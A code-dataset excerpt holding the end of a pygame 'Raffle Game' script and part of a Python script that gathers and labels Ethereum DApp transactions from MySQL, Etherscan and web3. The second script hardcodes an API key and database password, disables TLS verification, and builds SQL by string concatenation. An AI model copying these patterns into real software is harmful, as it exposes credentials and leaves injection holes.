CurrentWord = ''\r\n if overflow == 'normal':\r\n for char in Text:\r\n if char not in [' ','\\n']:\r\n try:\r\n Image = Font[str(char)][1]\r\n CurrentWord += str(char)\r\n except KeyError:\r\n pass\r\n else:\r\n WordTotal = 0\r\n for char2 in CurrentWord:\r\n WordTotal += Font[char2][0]\r\n WordTotal += Spacing\r\n if WordTotal+X-OriginalX > WidthLimit:\r\n X = OriginalX\r\n Y += Font['Height']\r\n for char2 in CurrentWord:\r\n Image = Font[str(char2)][1]\r\n surface.blit(pygame.transform.scale(Image,(Image.get_width()*double,Image.get_height()*double)),(X*double,Y*double))\r\n X += Font[char2][0]\r\n X += Spacing\r\n if char == ' ':\r\n X += Font['A'][0]\r\n X += Spacing\r\n else:\r\n X = OriginalX\r\n Y += Font['Height']\r\n CurrentWord = ''\r\n if X-OriginalX > WidthLimit:\r\n X = OriginalX\r\n Y += Font['Height']\r\n return X,Y\r\n if overflow == 'cut all':\r\n for char in Text:\r\n if char not in [' ','\\n']:\r\n try:\r\n Image = Font[str(char)][1]\r\n surface.blit(pygame.transform.scale(Image,(Image.get_width()*double,Image.get_height()*double)),(X*double,Y*double))\r\n X += Font[str(char)][0]\r\n X += Spacing\r\n except KeyError:\r\n pass\r\n else:\r\n if char == ' ':\r\n X += Font['A'][0]\r\n X += Spacing\r\n if char == '\\n':\r\n X = OriginalX\r\n Y += Font['Height']\r\n CurrentWord = ''\r\n if X-OriginalX > WidthLimit:\r\n X = OriginalX\r\n Y += Font['Height']\r\n return X,Y\r\n\r\ndef generate_font(FontImage,FontSpacingMain,TileSize,TileSizeY,color):\r\n FontSpacing = deepcopy(FontSpacingMain)\r\n FontOrder = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','.','-',',',':','+','\\'','!','?','0','1','2','3','4','5','6','7','8','9','(',')','/','_','=','\\\\','[',']','*','\"','<','>',';']\r\n FontImage = pygame.image.load(FontImage).convert()\r\n NewSurf = pygame.Surface((FontImage.get_width(),FontImage.get_height())).convert()\r\n NewSurf.fill(color)\r\n FontImage.set_colorkey((255,0,0))\r\n NewSurf.blit(FontImage,(0,0))\r\n FontImage = NewSurf.copy()\r\n FontImage.set_colorkey((0,0,0))\r\n num = 0\r\n for char in FontOrder:\r\n FontImage.set_clip(pygame.Rect(((TileSize+1)*num),0,TileSize,TileSizeY))\r\n CharacterImage = 
FontImage.subsurface(FontImage.get_clip())\r\n CharacterImage = CharacterImage.convert()\r\n CharacterImage.set_colorkey((0,0,0))\r\n try:\r\n FontSpacing[char].append(CharacterImage)\r\n except KeyError:\r\n break\r\n num += 1\r\n FontSpacing['Height'] = TileSizeY\r\n return FontSpacing\r\n\r\n\r\nclass Data(object):\r\n def __init__(self):\r\n self.root=tk.Tk()\r\n self.root.geometry(\"300x100+500+200\") \r\n self.root.title(\"Raffle Game\")\r\n\r\n self.x_var = tk.StringVar() \r\n self.y_var = tk.StringVar()\r\n self.bombs = tk.StringVar() \r\n\r\n self.x_label = tk.Label(self.root, text = 'No of Columns: ', \r\n font=('courier', \r\n 10, ))\r\n\r\n self.y_label = tk.Label(self.root, text = 'No of Rows: ', \r\n font=('courier', \r\n 10, )) \r\n \r\n self.bomb_label = tk.Label(self.root, text = 'No of Bomb: ', \r\n font=('courier', \r\n 10, )) \r\n \r\n self.x_entry = tk.Entry(self.root, textvariable = self.x_var, font=('courier',10,'normal')) \r\n \r\n self.y_entry = tk.Entry(self.root, textvariable = self.y_var, font=('courier',10,'normal')) \r\n\r\n self.bomb_entry = tk.Entry(self.root, textvariable = self.bombs, font=('courier',10,'normal')) \r\n\r\n self.sub_btn=tk.Button(self.root,text = 'Submit', command = self.submit) \r\n \r\n self.x_label.grid(row=0,column=0) \r\n self.x_entry.grid(row=0,column=1) \r\n self.y_label.grid(row=1,column=0) \r\n self.y_entry.grid(row=1,column=1) \r\n self.bomb_label.grid(row=2,column=0) \r\n self.bomb_entry.grid(row=2,column=1) \r\n self.sub_btn.grid(row=3,column=1) \r\n \r\n self.root.mainloop() \r\n \r\n \r\n def submit(self): \r\n x = self.x_var.get() \r\n y = self.y_var.get() \r\n bomb = self.bombs.get() \r\n self.x_var.set(\"\") \r\n self.y_var.set(\"\") \r\n self.root.destroy()\r\n self.start = Raffle(int(x), int(y), int(bomb))\r\n \r\n\r\n\r\n\r\n\r\nclass Grid(object):\r\n def __init__(self, x, y, w, h):\r\n self.x, self.y = x, y\r\n self.w, self.h = w, h\r\n self.bomb = False\r\n self.notbomb = False\r\n self.col = (0, 0, 0)\r\n self.image = pygame.image.load(\"images/bomb.png\")\r\n self.clicked = False\r\n \r\n def _id(self):\r\n self.clicked = True\r\n if self.bomb:\r\n self.notbomb = True\r\n self.bomb = False\r\n self.clicked = False\r\n\r\n\r\n def show(self, win):\r\n if self.clicked and not self.notbomb:\r\n self.col = (231, 0, 150)\r\n pygame.draw.rect(win, self.col, (self.x*self.w, self.y*self.h, self.w-1, self.h-1))\r\n if self.notbomb:\r\n win.blit(pygame.transform.scale(self.image, (self.w-1, self.h-1)), (self.x*self.w, self.y*self.h))\r\n \r\n\r\n\r\nclass Raffle(object):\r\n def __init__(self, cols, rows, bombs):\r\n self.cols = cols\r\n self.rows = rows\r\n \r\n self.size = (width, height) = cols*30, rows*30\r\n pygame.init()\r\n\r\n self.win = pygame.display.set_mode(self.size)\r\n self.icon = pygame.image.load(\"images/2.png\")\r\n pygame.display.set_caption(\"Raffle Game\")\r\n pygame.display.set_icon(self.icon)\r\n self.clock = pygame.time.Clock()\r\n\r\n\r\n self.w = width//cols\r\n self.h = height//rows\r\n\r\n self.grid = []\r\n\r\n\r\n # Font ------------------------------------------------------- #\r\n self.font_dat = {'A':[3],'B':[3],'C':[3],'D':[3],'E':[3],'F':[3],'G':[3],'H':[3],'I':[3],'J':[3],'K':[3],'L':[3],'M':[5],'N':[3],'O':[3],'P':[3],'Q':[3],'R':[3],'S':[3],'T':[3],'U':[3],'V':[3],'W':[5],'X':[3],'Y':[3],'Z':[3],\r\n 
'a':[3],'b':[3],'c':[3],'d':[3],'e':[3],'f':[3],'g':[3],'h':[3],'i':[1],'j':[2],'k':[3],'l':[3],'m':[5],'n':[3],'o':[3],'p':[3],'q':[3],'r':[2],'s':[3],'t':[3],'u':[3],'v':[3],'w':[5],'x':[3],'y':[3],'z':[3],\r\n                            '.':[1],'-':[3],',':[2],':':[1],'+':[3],'\\'':[1],'!':[1],'?':[3],\r\n                            '0':[3],'1':[3],'2':[3],'3':[3],'4':[3],'5':[3],'6':[3],'7':[3],'8':[3],'9':[3],\r\n                            '(':[2],')':[2],'/':[3],'_':[5],'=':[3],'\\\\':[3],'[':[2],']':[2],'*':[3],'\"':[3],'<':[3],'>':[3],';':[1]}\r\n\r\n        self.font = generate_font('font/small_font.png', self.font_dat, 5, 8, (255, 255, 255)) \r\n\r\n        #Initialize Grids\r\n        for i in range(self.cols):\r\n            arr = []\r\n            for j in range(self.rows):\r\n                arr.append(Grid(i, j, self.w, self.h))\r\n            self.grid.append(arr)\r\n\r\n        for i in range(bombs):\r\n            a, b = random.randint(0, cols-1), random.randint(0, rows-1)\r\n            while self.grid[a][b].bomb:\r\n                a, b = random.randint(0, cols-1), random.randint(0, rows-1)\r\n            self.grid[a][b].bomb = True\r\n\r\n\r\n        self.main()\r\n\r\n    # Put or remove walls\r\n    def clickWall(self, pos, state):\r\n        tile = self.grid[pos[0] // self.w][pos[1] // self.h]\r\n        tile._id()\r\n\r\n    def main(self):\r\n        while True:\r\n            for event in pygame.event.get(): # All events (mouse moving, button clicks, mouse clicks etc)\r\n                if event.type == pygame.QUIT: # If they try to close the window\r\n                    pygame.quit()\r\n                    sys.exit()\r\n                elif event.type == pygame.MOUSEBUTTONDOWN: # If they press the mouse (any button)\r\n                    if event.button in (1, 3): # And it's a left or right click\r\n                        self.clickWall(pygame.mouse.get_pos(), event.button==1) # Click a wall with either (True as a left click or False as not a left click (a right click)\r\n\r\n\r\n            self.win.fill((236,240,241))\r\n\r\n            for i in range(self.cols):\r\n                for j in range(self.rows):\r\n                    spot = self.grid[i][j]\r\n                    spot.show(self.win)\r\n                    show_text(str(i+j*self.cols+1), i*self.w+self.w//3+2, j*self.h+self.h//3+10, 1, 9999, self.font, self.win) \r\n\r\n            pygame.display.flip()\r\n\r\n\r\nintro = Data()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"naschwin/Lottery-Picker","sub_path":"Game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"12218062700","text":"# -*- coding: utf-8 -*-\nimport zipfile, os, sys\nimport requests, ssl, json\nimport pymysql\nimport re\nimport numpy as np\nimport pandas as pd\nimport json, csv\nimport traceback\nimport logging\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime, timedelta\nimport time\nfrom tqdm import tqdm\nfrom sqlalchemy import create_engine\nimport base64\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom collections import Counter\nimport random\nfrom web3.auto.infura import w3\nfrom copy import copy\nfrom bisect import bisect_left, bisect_right\nfrom baseFunction import read_list, save_list, graphConstructor, calcGraphSimilarityByGED\nimport calendar\n\nif w3.isConnected() is not True:\n    print(\"connect to node error, please check your setting....\")\n    print(\">>> https://web3py.readthedocs.io/en/stable/providers.html\")\n    \ndef jaccard_similarity(s1, s2):\n    def add_space(s):\n        return ' '.join(list(s))\n    \n    # insert a space between every character\n    s1, s2 = add_space(s1), add_space(s2)\n    # convert to a term-frequency matrix\n    cv = CountVectorizer(tokenizer=lambda s: s.split())\n    corpus = [s1, s2]\n    vectors = cv.fit_transform(corpus).toarray()\n    # intersection: sum of the element-wise minima\n    numerator = np.sum(np.min(vectors, axis=0))\n    # union: sum of the element-wise maxima\n    denominator = np.sum(np.max(vectors, axis=0))\n    # compute the Jaccard coefficient\n    return 1.0 * numerator / denominator\ndef getAllABIInDB():\n    # get all the hashkeys stored in the table\n    db = pymysql.connect( host='localhost',\n                        user='root',\n                        password='hello',\n                        db='dapp_analysis_rearrange'\n                        )\n    cursor = db.cursor()\n    sql = \"SELECT text_signature, hex_signature FROM MethodABI;\"\n    cursor.execute(sql)\n    repetition = cursor.fetchall()\n    \n    db.close()\n    return repetition\n\ndef getAllTxInDB():\n    db = pymysql.connect( host='localhost', user='root', password='hello', db='dapp_analysis_rearrange')\n    cursor = db.cursor()\n    sql = \"select distinct `hashKey` from TransactionDescription_trainset_extend_test;\"\n    cursor.execute(sql)\n    existedTxSet = set([r[0] for r in cursor.fetchall()])\n    db.close()\n\n    return existedTxSet\n\ndef getTypeDict():\n    # build the contract-address-to-type lookup dict\n    db = pymysql.connect( host='localhost', user='root', password='hello', db='dapp_analysis_rearrange')\n    cursor = db.cursor()\n    sql = \"select address, type from SmartContract_transfer;\"\n    cursor.execute(sql)\n    repetition = cursor.fetchall()\n    db.close()\n\n    address2type = dict()\n    for r in repetition:\n        address2type[r[0]] = r[1]\n\n    return address2type\n\nabiTuple = getAllABIInDB()\n# existedTxSet = getAllTxInDB()\naddress2type = getTypeDict()\n\nclass Preprocessing(object):\n\n    def __init__(self, gameName, gameAddr):\n        context = ssl._create_unverified_context()\n        requests.adapters.DEFAULT_RETRIES = 500\n\n        self.headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3112.90 Safari/537.36'}\n        self.proxy = {'http': 'socks5://127.0.0.1:1086','https':'socks5://127.0.0.1:1086'}\n\n        self.gameName = gameName\n        self.gameAddr = gameAddr\n        self.denoisingAddr = self.getDenoisingAddrByGameDB()\n        self.gameAddress = set()\n        self.gameDict = dict()\n\n        self.address2type = address2type\n        self.address2code = dict()\n\n        self.mode = \"test\"\n\n    def getTXbyGameNameInET(self):\n        # use the game name to fetch all controlling user addresses (userAddress) in its transactions\n        db = pymysql.connect( host='localhost', user='root', password='hello', db='dapp_analysis_rearrange')\n        cursor = db.cursor()\n        sql = \"SELECT td.*,g.jsonContent FROM TransactionGraph AS g LEFT JOIN ExtendTx AS td ON g.hashKey=td.hashKey WHERE td.gameName=\\\"%s\\\";\"% self.gameName\n        cursor.execute(sql)\n        repetition = cursor.fetchall()\n\n        handled_tx = \"select distinct `seed` from TransactionDescription_trainset_extend_test;\"\n        cursor.execute(handled_tx)\n        handled_rep = set([r[0] for r in cursor.fetchall()])\n        db.close()\n\n        repetition = [r for r in repetition if r[0] not in handled_rep]\n\n        return repetition\n\n\n    def saveTXbyGameNameInET(self):\n        # use the game name to fetch all controlling user addresses (userAddress) in its transactions\n        db = pymysql.connect( host='localhost', user='root', password='hello', db='dapp_analysis_rearrange')\n        cursor = db.cursor()\n        sql = \"SELECT td.*,g.jsonContent FROM TransactionGraph AS g LEFT JOIN ExtendTx AS td ON g.hashKey=td.hashKey WHERE td.gameName=\\\"%s\\\";\"% self.gameName\n        cursor.execute(sql)\n        repetition = cursor.fetchall()\n\n        handled_tx = \"select distinct `seed` from TransactionDescription_trainset_extend_test;\"\n        cursor.execute(handled_tx)\n        handled_rep = set([r[0] for r in cursor.fetchall()])\n        db.close()\n\n        repetition = [r for r in repetition if r[0] not in handled_rep]\n\n        return repetition\n\n\n    def getTXbyGameNameInTD(self):\n        # use the game name to fetch all controlling user addresses (userAddress) in its transactions\n        db = pymysql.connect( host='localhost', user='root', password='hello', db='dapp_analysis_rearrange')\n        cursor = db.cursor()\n        sql = \"SELECT td.*,g.jsonContent FROM TransactionGraph AS g LEFT JOIN TransactionDescription AS td ON g.hashKey=td.hashKey WHERE td.gameName=\\\"%s\\\";\"% self.gameName\n        cursor.execute(sql)\n        repetition = cursor.fetchall()\n\n        handled_tx = \"select distinct `seed` from TransactionDescription_trainset_extend_test;\"\n        cursor.execute(handled_tx)\n        handled_rep = set([r[0] for r in cursor.fetchall()])\n        db.close()\n\n        repetition = [r for r in repetition if r[0] not in handled_rep]\n\n        return repetition\n\n    def getDenoisingAddrByGameDB(self):\n        # get the addresses that need denoising\n        db = pymysql.connect( host='localhost', user='root', password='hello', db='dapp_analysis_rearrange')\n        cursor = db.cursor()\n        sql = \"SELECT smartContractAddress FROM GameContract WHERE gameName=\\\"%s\\\";\"% self.gameName\n        cursor.execute(sql)\n        repetition = cursor.fetchall()\n        db.close()\n\n        denoisingAddr = [i[0] for i in repetition]\n        return denoisingAddr\n    \n    def getEOAsOfGame(self, repetition):\n        # collect every address that interacted with this game\n        addrSet = set([ r[1] for r in repetition]).union(set([ r[6] for r in repetition]))\n        addrSet = set([addr for addr in addrSet if addr not in self.denoisingAddr and addr is not None])\n        # split the set into users and contracts\n        userSet = set()\n        contractSet = set()\n        for addr in addrSet:\n            addrType = self.typeIdentify(addr)\n            if addrType == \"user\":\n                userSet.add(addr)\n            elif addrType == \"contract\":\n                contractSet.add(addr)\n            else:\n                print(\"%s has type %s, which is neither user nor contract\" % (addr, self.address2type[addr]))\n                continue\n        return userSet, contractSet\n\n    def getEOAsOfGameInET(self, repetition):\n        # collect every address that interacted with this game\n        userSet = set([ r[8] for r in repetition if r[9] == \"user\"])\n        contractSet = set([r[11] for r in repetition if r[11] not in self.denoisingAddr and r[12] == \"contract\"])\n        return userSet, contractSet\n\n    def pickTxbyETInWeb(self, wholeTxList, period):\n        pickTxList = [tx for tx in wholeTxList if int(tx['timeStamp']) >= period[0] and int(tx['timeStamp']) <= period[1]]\n        timestampArray = np.array([tx['timeStamp'] for tx in wholeTxList], dtype=int)\n        startIdx = np.searchsorted(timestampArray, period[0])\n        endIdx = np.searchsorted(timestampArray, period[1], side='right')\n        return wholeTxList[startIdx:endIdx]\n\n    def preprocessing(self):\n        repetition = self.getTXbyGameName()\n        userSet, contractSet = self.getEOAsOfGame(repetition)\n        \n        for user in tqdm(userSet):\n            focusTxlist = [r for r in repetition if r[1] == user or r[6] == user]\n            periodList = self.periodListCalcu(user, focusTxlist)\n            wholeTxList = self.getTxlistByAddress(user) # fetch the full tx list for this address\n            pickedTxList = self.pickTx(wholeTxList, periodList)\n            self.saveTxlistToDB(pickedTxList)\n\n        return\n\n    def pickTx(self, wholeTxList, periodList):\n        timestampArray = np.array([int(tx['timeStamp']) for tx in wholeTxList], dtype=int)\n        pickTxList = []\n        for period in periodList:\n            startIdx = np.searchsorted(timestampArray, period[0])\n            endIdx = np.searchsorted(timestampArray, period[1], side='right')\n            for tx in wholeTxList[startIdx : endIdx]:\n                tx['seed'] = period[2]\n                pickTxList.append(tx)\n        dupSeedHash = [item for item, count in Counter([tx['hash'] for tx in pickTxList]).items() if count > 1]\n        \n        dupSeedTxlist = []\n        for hashKey in dupSeedHash:\n            dupSeedTxs = [tx for tx in pickTxList if tx['hash'] == hashKey]\n            tx = dupSeedTxs[0]\n            tx['seed'] = \", \".join(set([tx['seed'] for tx in dupSeedTxs]))\n            pickTxList = [tx for tx in pickTxList if tx['hash'] != hashKey]\n            pickTxList.append(tx)\n        \n        return pickTxList\n\n    def 
distance(self, r1, r2):\n        g1 = graphConstructor(json.loads(r1[-1]))\n        g2 = graphConstructor(json.loads(r2[-1]))\n        # compute the edit distance between the two adjacent graphs\n        graphDistance = calcGraphSimilarityByGED(g1, g2) # returns a distance: the smaller the value, the more similar\n        date1 = r1[4]\n        date2 = r2[4]\n        dateDistance = abs((date1-date2).total_seconds()/60) # time difference, measured in minutes\n\n        alpha = 1\n        beta = 1\n        distance = alpha*graphDistance + beta*dateDistance\n        return distance\n\n    def getCodeByAddress(self, address):\n        if address in self.address2code.keys():\n            return self.address2code[address]\n        else:\n            code = w3.eth.getCode(w3.toChecksumAddress(address))\n            self.address2code[address] = code\n            return code\n\n    def CodeSimilarity(self, address):\n        simList = []\n        for i in self.documentedContractSet:\n            simList.append(jaccard_similarity(w3.toHex(self.getCodeByAddress(address)), w3.toHex(self.getCodeByAddress(i))))\n\n        return max(simList)\n\n\n    # --------------------------------------------------------------\n    def typeIdentify(self, addr):\n        # check that this is a well-formed address\n        if addr is None or len(addr) != 42 or addr[:2] != \"0x\":\n            return None\n        # work out whether the address is a user or a contract\n        if addr not in self.address2type.keys():\n            code = w3.eth.getCode(w3.toChecksumAddress(addr))\n            if len(code)<1 and self.isExchange(addr) is True:\n                self.address2type[addr] = \"exchange\"\n            elif len(code) < 1 and self.isKilledAddress(addr) is True:\n                self.address2code[addr] = code\n                self.address2type[addr] = 'contract'\n            elif len(code) < 1:\n                self.address2type[addr] = \"user\"\n            elif len(code) > 1:\n                self.address2code[addr] = code\n                self.address2type[addr] = 'contract'\n            self.saveAddressToDB(addr, self.address2type[addr])\n        return self.address2type[addr]\n\n\n    def isKilledAddress(self, addr):\n        url = \"https://etherscan.io/address/\" + addr\n        res = requests.get(url, verify=False, timeout=50)\n        soup = BeautifulSoup(res.content,'lxml')\n\n        alist = soup.find('li',id=\"ContentPlaceHolder1_li_code\")\n        if alist is not None:\n            return True\n        return False\n\n    def isExchange(self, addr):\n        url = \"https://etherscan.io/address/\" + addr\n        res = requests.get(url, verify=False, timeout=50)\n        soup = BeautifulSoup(res.content,'lxml')\n\n        alist = soup.find_all('a',class_=\"u-label--secondary\")\n        for a in alist:\n            if a.text == \"Exchange\":\n                return True\n        return False\n\n    def fillTimeInfo(self):\n        timestampArray = [ calendar.timegm(i.timetuple()) for i in self.groupDate]\n        self.timestampMean = np.mean(timestampArray)\n\n        # self.timestampStd = np.std(timestampArray) if len(timestampArray) > 1 else 100000\n        self.timestampStd = 20000\n        self.timeMin = min(timestampArray) - self.timestampStd\n        self.timeMax = max(timestampArray) + self.timestampStd\n        print(\">>> time mean = \" + datetime.utcfromtimestamp(self.timestampMean).strftime(\"%Y-%m-%d %H:%M:%S\") + \" var = \" + str(self.timestampStd))\n        print(\">>> timeMin = \" + datetime.utcfromtimestamp(self.timeMin).strftime(\"%Y-%m-%d %H:%M:%S\") + \"; timeMax = \" + datetime.utcfromtimestamp(self.timeMax).strftime(\"%Y-%m-%d %H:%M:%S\"))\n        pass\n\n    def getTxlistByAddress(self, address, startblock=0, endblock=99999999):\n        # mode = time means that only the txs inside the time window are fetched\n\n        for i in range(5):\n            url = \"http://api.etherscan.io/api?module=account&action=txlist&address=\" + address +\"&startblock=\" + str(startblock) + \"&endblock=\" + str(endblock) + \"&sort=desc&apikey=WQ5Y216EK6SP2E9SJIBVDJNI1BI7KAIR42\"\n            res = requests.get(url, verify=False, timeout=50)\n            text = json.loads(res.text)\n            if text['message'] == 'OK':\n                break\n            elif \"Please select a smaller result dataset\" in text['message'] and (endblock - startblock) > 1:\n                print(\"# result set too large, startblock %d, endblock %d\" % (startblock, endblock))\n                endblock = (endblock - startblock)/10 + startblock\n\n        \n        txlist = text['result'][::-1] # some of the txs etherscan returns are redundant\n\n        if len(txlist) > 2000:\n            print(\"address %s has a tx list of length %d\" % (address, len(txlist)))\n        for i in range(0, len(txlist)):\n            txlist[i]['from'] = txlist[i]['from'].lower()\n            txlist[i]['to'] = txlist[i]['to'].lower()\n        return txlist\n\n    def periodListCalcu(self, address, focusTxlist):\n        periodList = []\n        for tx in focusTxlist:\n            time = datetime.utcfromtimestamp(int(tx['timeStamp']))\n            timeMin = time - timedelta(days=1)\n            # timeMax = time + timedelta(days=1)\n            timeMax = time + timedelta(seconds=1)\n            periodList.append( (calendar.timegm(timeMin.timetuple()), calendar.timegm(timeMax.timetuple()), tx['hash']) )\n\n        return periodList\n\n    def periodListCalcuForEnlarger(self, address, focusTxlist):\n        periodList = []\n        for tx in focusTxlist:\n            time = tx[1]\n            timeMin = time - timedelta(days=1)\n            # timeMax = time + timedelta(days=1)\n            timeMax = time + timedelta(days=1)\n            periodList.append( (calendar.timegm(timeMin.timetuple()), calendar.timegm(timeMax.timetuple()), tx[0]) )\n\n        return periodList\n\n    def periodListCalcuForTest(self, address, focusTxlist):\n        periodList = []\n        for tx in focusTxlist:\n            time = tx[4]\n            timeMin = time - timedelta(days=1)\n            timeMax = time + timedelta(days=1)\n            # timeMax = time + timedelta(seconds=1)\n            periodList.append( (calendar.timegm(timeMin.timetuple()), calendar.timegm(timeMax.timetuple()), tx[0]) )\n\n        return periodList\n\n    def getTXbyGameAddressInWeb(self, dapp, startblock=0, endblock=99999999):\n        txlist = self.getTxlistByAddress(dapp, startblock=startblock, endblock=endblock)\n        return txlist\n\n    def decodeMethod(self, tx):\n        if len(tx['to']) == 0 and len(tx[\"input\"])>2:\n            return \"contract creation\"\n        elif tx['input'] == '0x':\n            return \"transfer\"\n        elif len(tx[\"input\"]) > 10:\n            return self.Hex2Text(tx[\"input\"][:10], tx[\"input\"])\n        else:\n            return tx[\"input\"]\n    def Hex2Text(self, hex, input):\n        candidateSign = [i[0] for i in abiTuple if i[1] == hex]\n        if len(candidateSign) == 1:\n            return candidateSign[0]\n        elif len(candidateSign) == 0:\n            return hex\n        else:\n            s = len(input[10:])/64\n            for c in candidateSign:\n                paraCnt = len(c.split(\",\"))\n                if paraCnt == s:\n                    return c\n            return hex\n\n        return hex\n    def tupleBuild(self, tx, user):\n        tx['txDate'] = datetime.utcfromtimestamp(int(tx['timeStamp'])).strftime(\"%Y-%m-%d %H:%M:%S\")\n        tx[\"txMethod\"] = self.decodeMethod(tx)\n        tx['senderType'] = self.typeIdentify(tx['from'])\n        tx['receiverType'] = self.typeIdentify(tx['to'])\n        tx[\"value\"] = str(w3.fromWei(int(tx[\"value\"]), 'ether'))\n\n        r = ( tx['hash'], tx['txDate'], self.gameName, self.gameAddr, tx['seed'], None,\n            tx['from'], tx['senderType'], None, tx['txMethod'], tx['to'], tx['receiverType'], None, \n            None, None, None, None, None, None, None, \n            tx['value'], tx['input'], tx['isError'], tx['contractAddress'], None, self.gameName, None, None, 5, user\n            )\n        return r\n\n    def saveTxlistToDB(self, pickedTxList, user):\n        \n        db = pymysql.connect('localhost', 'root', 'hello', 'dapp_analysis_rearrange')\n        cursor = db.cursor()\n\n        handled_tx = \"select distinct `hashKey` from TransactionDescription_goodset_extend where gameName = \\\"%s\\\";\" % self.gameName\n        cursor.execute(handled_tx)\n        handled_rep = set([r[0] for r in cursor.fetchall()])\n\n        # updateSql = \"INSERT INTO TransactionDescription_testset_extend(hashKey, txDate, gameName, gameAddress, seed, similarity, sender, senderType, senderName, txMethod, receiver, receiverType, receiverName, txLabel, txLabelNew, labelReason, suicide, profit, traceCnt, prepare, value, input, isError, contractAddress, ori, seedGame, seedEOA) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\n        # updateSql = \"INSERT INTO TransactionDescription_trainset_extend_test(hashKey, txDate, gameName, gameAddress, seed, similarity, sender, senderType, senderName, txMethod, receiver, receiverType, receiverName, txLabel, txLabelNew, labelReason, suicide, profit, traceCnt, prepare, value, input, isError, contractAddress, ori, seedGame, graphDistance, dateDistance, stage, seedEOA) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\n        updateSql = \"INSERT INTO TransactionDescription_goodset_extend(hashKey, txDate, gameName, gameAddress, seed, similarity, sender, senderType, senderName, txMethod, receiver, receiverType, receiverName, txLabel, txLabelNew, labelReason, suicide, profit, traceCnt, prepare, value, input, isError, contractAddress, ori, seedGame, graphDistance, dateDistance, stage, seedEOA) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\n\n        for tx in pickedTxList:\n            try:\n                if tx['hash'] not in handled_rep:\n                    r = self.tupleBuild(tx, user)\n                    cursor.execute(updateSql, r)\n                    db.commit()\n            except Exception as e:\n                db.rollback()\n                print(e)\n                print(\" address is %s and hashkey is %s\" % (tx['seed'], tx['hash']))\n                # print(r)\n                continue\n\n        db.close()\n\n\n    def saveAddressToDB(self, addr, addrType):\n        db = pymysql.connect('localhost', 'root', 'hello', 'dapp_analysis_rearrange')\n        cursor = db.cursor()\n        updateSql = \"INSERT INTO SmartContract_transfer(address, type, byteCode, sourceCode, `level`, `detail`, killed) VALUES (%s, %s, %s, %s, %s, %s, %s);\"\n        r = (addr, addrType, None, None, None, None, None)\n        try:\n            cursor.execute(updateSql, r)\n            # print(r)\n            db.commit()\n        except Exception as e:\n            db.rollback()\n            print(e)\n            print(\" address %s failed to save!\" % (addr))\n            print(r)\n\n        db.close()\n\n\n    def getTxByEOAInTest(self, game, eoa, mode=\"goodset\"):\n        # use the game name to fetch all controlling user addresses (userAddress) in its transactions\n        db = pymysql.connect( host='localhost', user='root', password='hello', db='dapp_analysis_rearrange')\n        cursor = db.cursor()\n        if self.mode == \"test\":\n            sql = \"SELECT td.*,g.jsonContent FROM TransactionDescription_testset AS td LEFT JOIN TransactionGraph_unknown AS g ON g.hashKey=td.hashKey WHERE td.gameName=\\\"\" + game + \"\\\" and td.controlUserAddress=\\\"\" + eoa + \"\\\" order by txDate;\"\n        elif self.mode == \"enlarger\":\n            sql = \"SELECT td.*,g.jsonContent FROM TransactionDescription_testset_enlarger AS td LEFT JOIN TransactionGraph_unknown AS g ON g.hashKey=td.hashKey WHERE td.gameName=\\\"\" + game + \"\\\" and td.sender=\\\"\" + eoa + \"\\\" order by txDate;\"\n        elif self.mode == \"goodset\":\n            sql = \"SELECT td.*,g.jsonContent FROM TransactionDescription_goodset_enlarger AS td LEFT JOIN TransactionGraph_goodset AS g ON g.hashKey=td.hashKey WHERE td.gameName=\\\"\" + game + \"\\\" and td.sender=\\\"\" + eoa + \"\\\" order by txDate;\"\n        else:\n            raise ValueError(\"this mode does not exist, please check\")\n\n        cursor.execute(sql)\n        repetition = cursor.fetchall()\n\n        handled_tx = \"select distinct `seed` from TransactionDescription_goodset_extend where gameName=\\\"\" + game + \"\\\";\"\n        cursor.execute(handled_tx)\n        handled_rep = set([r[0] for r in cursor.fetchall()])\n        handled_rep = set()\n        db.close()\n\n        repetition = [r for r in repetition if r[0] not in handled_rep]\n        return repetition\n\n\n    def getTxByEOAInTestET(self, game, eoa):\n        # use the game name to fetch all controlling user addresses (userAddress) in its transactions\n        db = pymysql.connect( host='localhost', user='root', password='hello', db='dapp_analysis_rearrange')\n        cursor = db.cursor()\n        sql = \"SELECT td.*,g.jsonContent FROM TransactionDescription_testset_extend AS td LEFT JOIN TransactionGraph AS g ON g.hashKey=td.hashKey WHERE td.gameName=\\\"\" + game + \"\\\" and td.sender=\\\"\" + eoa + \"\\\" order by txDate;\"\n        cursor.execute(sql)\n        repetition = cursor.fetchall()\n        return repetition\n\n    def tupleBuildInTest(self, r):\n        try:\n            tx = dict()\n            tx['hashKey'] = r[0]\n            tx['txDate'] = r[4]\n            tx['gameName'] = r[2]\n            tx['gameAddress'] = r[3]\n            tx[\"txMethod\"] = r[5]\n            tx['sender'] = r[1]\n            tx['senderType'] = self.typeIdentify(r[1])\n            tx['senderName'] = None\n            tx['receiver'] = r[6]\n            tx['receiverType'] = self.typeIdentify(r[6])\n            tx['receiverName'] = r[7]\n            tx['txLabel'] = None\n            tx['txLabelNew'] = None\n            tx['labelReason'] = \"ExtendTx\"\n            tx['profit'] = None\n            tx['traceCnt'] = None\n            seedGame = r[2]\n        except Exception as e:\n            print(e)\n            print(r[6])\n        r = ( tx['hashKey'], tx['txDate'], 